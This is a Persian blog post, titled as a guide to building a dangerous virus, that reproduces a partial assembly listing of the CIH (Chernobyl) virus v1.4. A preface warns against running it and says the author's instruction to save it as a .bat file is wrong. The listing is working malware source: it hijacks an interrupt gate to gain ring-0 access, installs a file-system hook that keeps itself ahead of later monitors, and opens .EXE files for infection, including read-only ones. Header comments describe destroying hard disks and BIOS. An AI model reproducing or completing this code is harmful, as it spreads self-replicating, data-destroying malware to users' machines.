
    »» ساختن ویروس خطرناک! »» date:87/2/29 «» 8:50 ع

    این کد را روی کامپیوتر خودتان آزمایش نکنید. آنچه در ادامه آمده سورس ویروس CIH (نسخهٔ ۱٫۴، سال ۱۹۹۸) است که با سرویس‌های VxD ویندوز ۹۵/۹۸/ME (فراخوانی int 20h به VMM و IFSMgr) کار می‌کند و طبق توضیح سرآیند خودِ کد، روی ویندوزهای خانوادهٔ NT در اولین خطا با هندلر استثنا به برنامهٔ اصلی برمی‌گردد و ادامه نمی‌دهد؛ با این حال payload آن (به گفتهٔ همان سرآیند: تخریب دیسک‌های سخت و BIOS) مخرب است و این متن فقط برای تحلیل و آموزش اینجا آمده است.

    بریم سر اصل مطلب یعنی ساختش

    نویسنده گفته کدهای زیر را در Notepad کپی و با پسوند .bat ذخیره کنید؛ این دستور نادرست است: متن زیر یک فایل دسته‌ای نیست، سورس اسمبلی x86 برای Turbo Assembler است و طبق سرآیند خودش با «tasm /m cih» و «tlink /3 /t cih, cih.exe» ساخته می‌شود، بنابراین ذخیره‌کردن آن با پسوند .bat چیز قابل‌اجرایی نمی‌سازد. در هر حال آن را نسازید و روی کامپیوتر خود باز یا اجرا نکنید.

    طرز ساخت در ادامهٔ مطلب! (توجه: فهرست کد این صفحه ناقص است و در میانهٔ روال FileSystemApiHook، پیش از بخش آلوده‌سازی فایل و payload، قطع می‌شود.)

    ; ****************************************************************************
    ; * The Virus Program Information *
    ; ****************************************************************************
    ; * *
    ; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
    ; * Create Date : 04/26/1998 Now Version : 1.4 *
    ; * Modification Time : 05/31/1998 *
    ; * *
    ; * Turbo Assembler Version 4.0 : tasm /m cih *
    ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe *
    ; * *
    ; *==========================================================================*
    ; * Modification History *
    ; *==========================================================================*
    ; * v1.0 1. Create the Virus Program. *
    ; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
    ; * 04/26/1998 3. Virus Code doesn't Reload into System. *
    ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
    ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
    ; * 6. When System Opens an Existing PE File, the File will be *
    ; * Infected, and the File is not Reinfected. *
    ; * 7. It is also Infected, even if the File is Read-Only. *
    ; * 8. When the File is Infected, the Modification Date and Time *
    ; * of the File are also not Changed. *
    ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
    ; * the Previous FileSystemApiHook, it will Call the Function *
    ; * that the IFS Manager Would Normally Call to Implement *
    ; * this Particular I/O Request. *
    ; * 10. The Virus Size is only 656 Bytes. *
    ; *==========================================================================*
    ; * v1.1 1. Especially, the File that is Infected will not Increase *
    ; * its Size... ^__^ *
    ; * 05/15/1998 2. Hook and Modify Structured Exception Handling. *
    ; * When an Exception Error Occurs, Our OS should be *
    ; * Windows NT. So My Cute Virus will not Continue to Run, *
    ; * it will Jump to the Original Application to Run. *
    ; * 3. Use Better Algorithm, Reduce Virus Code Size. *
    ; * 4. The Virus "Basic" Size is only 796 Bytes. *
    ; *==========================================================================*
    ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
    ; * 2. Modify the Bug of v1.1 *
    ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
    ; *==========================================================================*
    ; * v1.3 1. Fix the Bug that WinZip Self-Extractor Causes an Error. *
    ; * So When Opening a WinZip Self-Extractor ==> Don't Infect it. *
    ; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
    ; *==========================================================================*
    ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
    ; * 2. Change the Date of Killing Computers. *
    ; * 05/31/1998 3. Modify Virus Version Copyright. *
    ; * 4. The Virus "Basic" Size is 1019 Bytes. *
    ; ****************************************************************************

    .586P

    ; ****************************************************************************
    ; * Original PE Executable File (Don't Modify this Section) *
    ; ****************************************************************************

    OriginalAppEXE SEGMENT

    ; Host stub: the minimal 32-bit PE image the virus body is appended to when
    ; the file is built stand-alone (tlink /3 /t, see the header).  The bytes
    ; below, by file offset:
    ;   0x000  DOS "MZ" header; e_lfanew (offset 0x3c) = 0x80
    ;   0x040  DOS stub (print string, exit) + "This program cannot be run in
    ;          DOS mode." text
    ;   0x080  "PE\0\0", Machine 0x014c (i386), 1 section, Characteristics 0x010f
    ;   0x098  Optional header: PE32, entry RVA 0x1010, BaseOfCode 0x1000,
    ;          ImageBase 0x400000, section/file alignment 0x1000/0x200,
    ;          SizeOfImage 0x2000, SizeOfHeaders 0x200, Subsystem 2 (GUI),
    ;          16 empty data directories
    ;   0x178  ".text" section header: VA 0x1000, raw size 0x1000, raw
    ;          pointer 0x200, Characteristics 0x60000020 (code|exec|read)
    ;   0x200  a single RET (0xc3): this is what the "original entry point"
    ;          0x401000 pushed at the end of MyVirusStart returns to
    ;   0x208  dd 0, VirusSize: the (next, size) record the merge loop in
    ;          MyVirusStart reads at [MyVirusStart-8] / [MyVirusStart-4]
    ; Entry RVA 0x1010 = file offset 0x210, i.e. the first byte of the
    ; VirusGame segment that follows, so running this image runs the virus
    ; first and the RET stub afterwards.  Do not reorder or resize anything
    ; here: every offset above is baked into the headers.
    FileHeader:
    db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
    db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
    db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h   ; e_lfanew = 0x80
    ; 0x40: DOS stub code, then the "This program cannot be run..." string
    db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
    db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
    db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
    db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
    db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
    db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
    db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
    db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    ; 0x80: PE signature + COFF file header
    db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
    db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
    ; 0x98: optional header (PE32)
    db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h   ; AddressOfEntryPoint 0x1010, BaseOfCode 0x1000
    db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h   ; BaseOfData 0x2000, ImageBase 0x400000
    db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
    db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
    db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
    db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
    db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
    db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    ; 0x178: ".text" section header
    db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
    db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h   ; VirtualSize 0x1000, VirtualAddress 0x1000
    db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h   ; SizeOfRawData 0x1000, PointerToRawData 0x200
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h   ; Characteristics 0x60000020
    ; 0x1a0..0x1ff: padding up to the first raw section
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    ; 0x200 (RVA 0x1000): the host's whole "program" -- one RET
    db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    ; 0x208: merge-loop record for the single code chunk: next = 0 (end of
    ; chain), size = VirusSize (VirusSize is defined outside this listing)
    dd 00000000h, VirusSize

    OriginalAppEXE ENDS

    ; ****************************************************************************
    ; * My Virus Game *
    ; ****************************************************************************

    ; *********************************************************
    ; * Constant Define *
    ; *********************************************************

    TRUE = 1
    FALSE = 0

    ; Build switch.  This listing has it at TRUE, and everything it selects
    ; below narrows the virus: the payload's disk number becomes 81h instead
    ; of 80h, the hijacked IDT vector becomes INT 5 instead of INT 3, and the
    ; file-system hook (under another IF DEBUG further down) refuses any file
    ; whose name does not end in "FUCK.EXE".  FALSE is the in-the-wild build.
    DEBUG = TRUE

    MajorVirusVersion = 1
    MinorVirusVersion = 4

    VirusVersion = MajorVirusVersion*10h+MinorVirusVersion   ; 14h, packed BCD-style


    IF DEBUG

    FirstKillHardDiskNumber = 81h   ; drive number the payload starts at (presumably a
                                    ; BIOS drive id: 80h = first HDD, 81h = second);
                                    ; the payload itself is not in this listing
    HookExceptionNumber = 05h       ; IDT vector whose gate MyVirusStart rewrites and
                                    ; then raises with INT n to reach ring 0

    ELSE

    FirstKillHardDiskNumber = 80h
    HookExceptionNumber = 03h

    ENDIF


    FileNameBufferSize = 7fh        ; max length handed to UniToBCSPath for the path buffer

    ; *********************************************************
    ; *********************************************************

    VirusGame SEGMENT

    ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
    ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame

    ; *********************************************************
    ; * Ring3 Virus Game Initial Program *
    ; *********************************************************

    ; -------------------------------------------------------------------------
    ; MyVirusStart: ring-3 entry of the virus body (the host's PE entry point
    ; points here).  Position independent: call/pop gives the runtime base.
    ;   1. Pushes a temporary SEH frame whose handler is StopToRunVirusCode.
    ;   2. Overwrites the offset of IDT gate HookExceptionNumber with
    ;      MyExceptionHook and raises that interrupt twice.  The flag state at
    ;      the INT is the argument the ring-0 handler reads:
    ;        pass 1, ZF = 0 : allocate system memory; returns EAX = this
    ;                         MyVirusStart, EDI = the new memory
    ;        pass 2, ZF = 1 : install the file-system hook from the copy
    ;   3. Between the passes copies every code chunk into the new memory.
    ;   4. Restores SEH and returns to the host's original entry point.
    ; The cli and the IDT write are only possible where the IDT is mapped
    ; writable to user code (Windows 9x).  Where either faults, the SEH
    ; handler unwinds and simply runs the host -- the "NT check" the header
    ; talks about.  EBP is saved/restored; everything else is clobbered.
    ; -------------------------------------------------------------------------
    MyVirusStart:
    push ebp

    ; *************************************
    ; * Let's Modify Structured Exception *
    ; * Handling, Prevent Exception Error *
    ; * Occurrence, Especially in NT.     *
    ; *************************************

    lea eax, [esp-04h*2]             ; EAX = where the 2-dword SEH record will sit once
                                     ; the two pushes below have happened (ESP-8)

    xor ebx, ebx
    xchg eax, fs:[ebx]               ; fs:[0] = our (not yet written) record; EAX = old head

    call @0
    @0:
    pop ebx                          ; EBX = runtime address of @0

    lea ecx, StopToRunVirusCode-@0[ebx]   ; ECX = runtime address of the SEH handler (= @1)
    push ecx                         ; record.Handler

    push eax                         ; record.Next = previous head

    ; *************************************
    ; * Let's Modify                      *
    ; * IDT (Interrupt Descriptor Table)  *
    ; * to Get Ring0 Privilege...         *
    ; *************************************

    push eax ;                       ; reserve a dword on the stack
    sidt [esp-02h] ; Get IDT Base Address: the 6-byte store puts the limit in the
                   ; 2 bytes below ESP and the 32-bit base in the reserved dword
    pop ebx ;                        ; EBX = IDT base

    add ebx, HookExceptionNumber*08h+04h ; EBX = &gate[n] + 4 (second dword); ZF = 0

    cli                              ; faults (#GP) on an NT-family kernel -> SEH handler

    mov ebp, [ebx] ; Get Exception Base: EBP = offset bits 31..16 (+ gate attrs low)
    mov bp, [ebx-04h] ; Entry Point:  low word <- offset bits 15..0, so EBP = old handler

    lea esi, MyExceptionHook-@1[ecx] ; ESI = runtime address of MyExceptionHook (= @2)

    push esi

    mov [ebx-04h], si ;              ; gate[n].offset_lo = new handler
    shr esi, 16 ; Modify Exception   ; (also leaves ZF = 0: the address is > 0FFFFh)
    mov [ebx+02h], si ; Entry Point Address: gate[n].offset_hi = new handler

    pop esi                          ; ESI = MyExceptionHook again; the ring-0 code reaches
                                     ; its labels as label-@2[esi]; POP preserves ZF

    ; *************************************
    ; * Generate Exception to Get Ring0   *
    ; *************************************

    int HookExceptionNumber ; pass 1 (ZF = 0): MyExceptionHook allocates memory and
    ReturnAddressOfEndException = $ ; comes back here with EAX = MyVirusStart, EDI = memory;
                                    ; if DR0 says the virus is already resident the handler
                                    ; instead moves this return address to ReadyRestoreSE

    ; *************************************
    ; * Merge All Virus Code Sections     *
    ; *************************************

    push esi
    mov esi, eax                     ; source = this copy of MyVirusStart

    LoopOfMergeAllVirusCodeSection:

    mov ecx, [eax-04h]               ; chunk length; first entry is the VirusSize dword
                                     ; stored just before MyVirusStart

    rep movsb                        ; append chunk at EDI (assumes DF = 0; never cleared here)

    sub eax, 08h                     ; walk the (next, size) table that grows downward
                                     ; from MyVirusStart, one 8-byte record per chunk
    mov esi, [eax]                   ; next chunk's address; 0 = end of chain

    or esi, esi
    jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 -- and this ZF is the "pass 2" argument

    jmp LoopOfMergeAllVirusCodeSection

    QuitLoopOfMergeAllVirusCodeSection:

    pop esi                          ; ESI = MyExceptionHook; ZF still 1

    ; *************************************
    ; * Generate Exception Again          *
    ; *************************************

    int HookExceptionNumber ; pass 2 (ZF = 1): hook the file system using the copy
                            ; that EDI now points past

    ; *************************************
    ; * Let's Restore                     *
    ; * Structured Exception Handling     *
    ; *************************************

    ReadyRestoreSE:
    sti                              ; undo the cli above

    xor ebx, ebx

    jmp RestoreSE

    ; *************************************
    ; * When an Exception Error Occurs,   *
    ; * the OS should be NT-family.       *
    ; * So the Virus does not Continue;   *
    ; * it Jumps to the Original          *
    ; * Application instead.              *
    ; *************************************

    ; SEH handler.  Never returns to the dispatcher: it resets ESP to our
    ; record and falls into the normal epilogue.  NOTE(review): it assumes
    ; that at handler time fs:[0] names a frame whose first dword is our
    ; record (the NT dispatcher pushes such a nested frame); not verified here.
    StopToRunVirusCode:
    @1 = StopToRunVirusCode

    xor ebx, ebx
    mov eax, fs:[ebx]                ; EAX = current SEH head
    mov esp, [eax]                   ; ESP = its Next = our record (entry ESP - 8)

    RestoreSE:
    pop dword ptr fs:[ebx]           ; fs:[0] = record.Next (previous head)
    pop eax                          ; discard record.Handler

    ; *************************************
    ; * Return to the Original App        *
    ; *************************************

    pop ebp

    push 00401000h ; Push the host's entry point.  This immediate is the field the
    OriginalAddressOfEntryPoint = $-4 ; infector rewrites; in the stand-alone build
                                      ; 0x401000 is the RET in OriginalAppEXE

    ret ; Return to Original App Entry Point

    ; *********************************************************
    ; * Ring0 Virus Game Initial Program *
    ; *********************************************************

    ; -------------------------------------------------------------------------
    ; MyExceptionHook: ring-0 code reached through the hijacked IDT gate.
    ; Entered on the INT's own frame (EIP, CS, EFLAGS) with the ring-3
    ; registers intact: ESI = this routine's address (@2), EBX = &gate[n]+4,
    ; EBP = the gate's original offset, ZF = which pass this is.
    ; DR0 is used as a global: 0 means the virus is not yet resident on this
    ; machine; later it holds the previous file-system hook pointer.
    ;   ZF = 1 : pass 2 -> InstallMyFileSystemApiHook
    ;   ZF = 0 : pass 1 -> DR0 != 0 : already resident; patch the pushed
    ;                      return EIP so ring 3 skips the merge and the 2nd INT
    ;                      DR0 == 0 : allocate system memory, return EAX/EDI
    ; Every exit restores the gate's original offset and IRETDs.
    ; -------------------------------------------------------------------------
    MyExceptionHook:
    @2 = MyExceptionHook

    jz InstallMyFileSystemApiHook    ; ZF = 1: second INT, code already merged

    ; *************************************
    ; * Does the Virus Exist in System !? *
    ; *************************************

    mov ecx, dr0                     ; DR0 = 0 -> first run on this machine
    jecxz AllocateSystemMemoryPage

    add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException ; already resident:
                                     ; advance the saved ring-3 EIP past the merge loop
                                     ; and the second INT, straight to the SEH restore

    ; *************************************
    ; * Return to Ring3 Initial Program   *
    ; *************************************

    ExitRing0Init:
    mov [ebx-04h], bp ;              ; gate[n].offset_lo = original handler
    shr ebp, 16 ; Restore Exception
    mov [ebx+02h], bp ;              ; gate[n].offset_hi = original handler

    iretd

    ; *************************************
    ; * Allocate System Memory to Use     *
    ; *************************************

    AllocateSystemMemoryPage:

    mov dr0, ebx ; Mark "virus present" with any nonzero value (replaced in pass 2)

    ; VMM _PageAllocate through the int 20h "VxDCall" stub.  Arguments are
    ; pushed right to left; ECX is 0 here (jecxz above).  Parameter names
    ; follow the documented _PageAllocate order -- NOTE(review): from VMM
    ; docs, not from this file.
    push 00000000fh ;                ; flags = 0Fh
    push ecx ;                       ; PhysAddr (out) = 0
    push 0ffffffffh ;                ; maxPhys = no limit
    push ecx ;                       ; minPhys = 0
    push ecx ;                       ; AlignMask = 0
    push ecx ;                       ; VM = 0
    push 000000001h ;                ; pType = 1 (system pages)
    push 000000002h ;                ; nPages = 2
    int 20h ; VMMCALL _PageAllocate
    _PageAllocate = $ ;              ; service id: high word = device 0001 (VMM), low = 0053
    dd 00010053h ; Use EAX, ECX, EDX, and flags
    add esp, 08h*04h                 ; caller cleans the 8 dword args

    xchg edi, eax ; EDI = SystemMemory Start Address (EAX result; a 0/failure
                  ; return is never checked, rep movsb would then write at 0)

    lea eax, MyVirusStart-@2[esi]    ; EAX = this copy's MyVirusStart = merge-loop source

    iretd ; Return to Ring3 Initial Program

    ; *************************************
    ; * Install My File System Api Hook *
    ; *************************************

    ; Pass 2, still ring 0 (jumped to from MyExceptionHook).  EDI = end of the
    ; merged copy; @6 is a data-area label defined further down and is used to
    ; address the copy relative to EDI, so it is the copy in system memory --
    ; not this image -- that becomes the resident hook.  Exits through
    ; ExitRing0Init (gate restored, IRETD).
    InstallMyFileSystemApiHook:

    lea eax, FileSystemApiHook-@6[edi]   ; EAX = address of the copied FileSystemApiHook

    push eax ;                       ; arg: hook to install
    int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook -> EAX = previous hook pointer
    IFSMgr_InstallFileSystemApiHook = $ ; ; this dword becomes the call's [slot] operand
                                        ; after VMM's dynamic-link fixup of the stub
    dd 00400067h ; device 0040 (IFSMgr), service 0067; uses EAX, ECX, EDX, flags

    mov dr0, eax ; Save OldFileSystemApiHook Address (DR0 now = chain to call next)

    pop eax ; EAX = FileSystemApiHook Address (the copy's)

    ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point.
    ; `label[esi]` is a memory operand in TASM: ECX = the dword VMM wrote into
    ; the stub above, i.e. the address of the IFSMgr service-table slot;
    ; EDX = the real service entry read from that slot.
    mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
    mov edx, [ecx]
    mov OldInstallFileSystemApiHook-@3[eax], edx   ; stored inside the copy (relative to @3)

    ; Modify IFSMgr_InstallFileSystemApiHook Entry Point: from here on any
    ; other caller of the service (a later file-system monitor, e.g. an AV
    ; driver) lands in the copy's InstallFileSystemApiHook, which puts the
    ; virus hook back in front of the newcomer's.
    lea eax, InstallFileSystemApiHook-@3[eax]
    mov [ecx], eax

    cli                              ; IF = 0 for the remaining ring-0 steps

    jmp ExitRing0Init

    ; *********************************************************
    ; * Code Size of Merge Virus Code Section                 *
    ; *********************************************************

    CodeSizeOfMergeVirusCodeSection = offset $   ; end-of-code marker; its consumer is
                                                 ; not in this listing

    ; *********************************************************
    ; * IFSMgr_InstallFileSystemApiHook *
    ; *********************************************************

    ; Replacement body for IFSMgr_InstallFileSystemApiHook: the service-table
    ; slot now points here, so this runs whenever anything in the system
    ; installs a file-system hook.  Called like the real service -- one
    ; dword argument (the caller's hook) on the stack, caller cleans up,
    ; EAX = previous hook.  Sequence: remove the virus hook, install the
    ; caller's hook through the real service, re-install the virus hook, and
    ; refresh DR0.  Net effect: the virus hook always stays first in the
    ; chain, ahead of any monitor installed after it.  Only EBX is preserved;
    ; EAX/ECX/EDX/flags are clobbered, same as the service it replaces.
    InstallFileSystemApiHook:
    push ebx

    call @4 ;
    @4: ;
    pop ebx ; mov ebx, offset FileSystemApiHook -- at runtime, since this code
    add ebx, FileSystemApiHook-@4 ;   runs from the relocated copy

    push ebx
    int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook(FileSystemApiHook)
    IFSMgr_RemoveFileSystemApiHook = $
    dd 00400068h ; device 0040 (IFSMgr), service 0068; uses EAX, ECX, EDX, flags
    pop eax                          ; drop the arg (result ignored)

    ; Call Original IFSMgr_InstallFileSystemApiHook to Link Client
    ; FileSystemApiHook.  [esp+8] = caller's argument: above the saved EBX
    ; and the return address.
    push dword ptr [esp+8]
    call OldInstallFileSystemApiHook-@3[ebx]   ; indirect through the saved real entry
    pop ecx

    push eax                         ; keep: this is the "previous hook" the caller gets

    ; Call Original IFSMgr_InstallFileSystemApiHook
    ; to Link My FileSystemApiHook back in front
    push ebx
    call OldInstallFileSystemApiHook-@3[ebx]
    pop ecx

    mov dr0, eax ; Adjust OldFileSystemApiHook Address: DR0 = what now follows the virus hook

    pop eax

    pop ebx

    ret                              ; no stack cleanup: caller pops its argument

    ; *********************************************************
    ; * Static Data                                           *
    ; *********************************************************

    OldInstallFileSystemApiHook dd ?   ; real service entry, written by InstallMyFileSystemApiHook
                                       ; (data inside the code stream; the copy is writable)

    ; *********************************************************
    ; * IFSMgr_FileSystemHook *
    ; *********************************************************

    ; *************************************
    ; * IFSMgr_FileSystemHook Entry Point *
    ; *************************************

    FileSystemApiHook:
    @3 = FileSystemApiHook

    pushad

    call @5 ;
    @5: ;
    pop esi ; mov esi, offset VirusGameDataStartAddress
    add esi, VirusGameDataStartAddress-@5

    ; *************************************
    ; * Is OnBusy !? *
    ; *************************************

    test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
    jnz pIFSFunc ; goto pIFSFunc

    ; *************************************
    ; * Is OpenFile !? *
    ; *************************************

    ; if ( NotOpenFile )
    ; goto prevhook
    lea ebx, [esp+20h+04h+04h]
    cmp dword ptr [ebx], 00000024h
    jne prevhook

    ; *************************************
    ; * Enable OnBusy *
    ; *************************************

    inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy

    ; *************************************
    ; * Get FilePath"s DriveNumber, *
    ; * then Set the DriveName to *
    ; * FileNameBuffer. *
    ; *************************************
    ; * Ex. If DriveNumber is 03h, *
    ; * DriveName is "C:". *
    ; *************************************

    ; mov esi, offset FileNameBuffer
    add esi, FileNameBuffer-@6

    push esi

    mov al, [ebx+04h]
    cmp al, 0ffh
    je CallUniToBCSPath

    add al, 40h
    mov ah, ":"

    mov [esi], eax

    inc esi
    inc esi

    ; *************************************
    ; * UniToBCSPath *
    ; *************************************
    ; * This Service Converts *
    ; * a Canonicalized Unicode Pathname *
    ; * to a Normal Pathname in the *
    ; * Specified BCS Character Set. *
    ; *************************************

    CallUniToBCSPath:
    push 00000000h
    push FileNameBufferSize
    mov ebx, [ebx+10h]
    mov eax, [ebx+0ch]
    add eax, 04h
    push eax
    push esi
    int 20h ; VXDCall UniToBCSPath
    UniToBCSPath = $
    dd 00400041h
    add esp, 04h*04h

    ; *************************************
    ; * Is FileName ".EXE" !? *
    ; *************************************

    ; cmp [esi+eax-04h], ".EXE"
    cmp [esi+eax-04h], "EXE."
    pop esi
    jne DisableOnBusy

    IF DEBUG

    ; *************************************
    ; * Only for Debug *
    ; *************************************

    ; cmp [esi+eax-06h], "FUCK"
    cmp [esi+eax-06h], "KCUF"
    jne DisableOnBusy

    ENDIF

    ; *************************************
    ; * Is Open Existing File !? *
    ; *************************************

    ; if ( NotOpenExistingFile )
    ; goto DisableOnBusy
    cmp word ptr [ebx+18h], 01h
    jne DisableOnBusy

    ; *************************************
    ; * Get Attributes of the File *
    ; *************************************

    mov ax, 4300h
    int 20h ; VXDCall IFSMgr_Ring0_FileIO
    IFSMgr_Ring0_FileIO = $
    dd 00400032h

    jc DisableOnBusy

    push ecx

    ; *************************************
    ; * Get IFSMgr_Ring0_FileIO Address *
    ; *************************************

    mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
    mov edi, [edi]

    ; *************************************
    ; * Is Read-Only File !? *
    ; *************************************

    test cl, 01h
    jz OpenFile

    ; *************************************
    ; * Modify Read-Only File to Write *
    ; *************************************

    mov ax, 4301h
    xor ecx, ecx
    call edi ; VXDCall IFSMgr_Ring0_FileIO

    ; *************************************
    ; * Open File *
    ; *************************************

    OpenFile:
    xor eax, eax
    mov ah, 0d5h
    xor ecx, ecx
    xor edx, edx
    inc edx
    mov ebx, edx
    inc ebx
    call edi ; VXDCall IFSMgr_Ring0_FileIO

    xchg ebx, eax ; mov ebx, FileHandle

    ; *************************************
    ; * Need to Restore *
    ; * Attributes of the File !? *
    ; *************************************

    pop ecx

    pushf

    test cl, 01h
    jz IsOpenFileOK

    ; *************************************
    ; * Restore Attributes of the File *
    ; *************************************

    mov ax, 4301h
    call edi ; VXDCall IFSMgr_Ring0_FileIO

    ; *************************************
    ; * Is Open File OK !? *
    ; *************************************

    IsOpenFileOK:
    popf

    jc DisableOnBusy

    ; *************************************
    ; * Open File Already Succeed. ^__^ *
    ; *************************************

    push esi ; Push FileNameBuffer Address to Stack

    pushf ; Now CF = 0, Push Flag to Stack

    add esi, DataBuffer-@7 ; mov esi, offset DataBuffer

    ; ***************************
    ; * Get OffsetToNewHeader *
    ; ***************************

    xor eax, eax
    mov ah, 0d6h

    ; For Doing Minimal VirusCode"s Length,
    ; I Save EAX to EBP.
    mov ebp, eax

    push 00000004h
    pop ecx
    push 0000003ch
    pop edx
    call edi ; VXDCall IFSMgr_Ring0_FileIO

    mov edx, [esi]

    ; ***************************
    ; * Get "PE



    فخرالدین خرمالی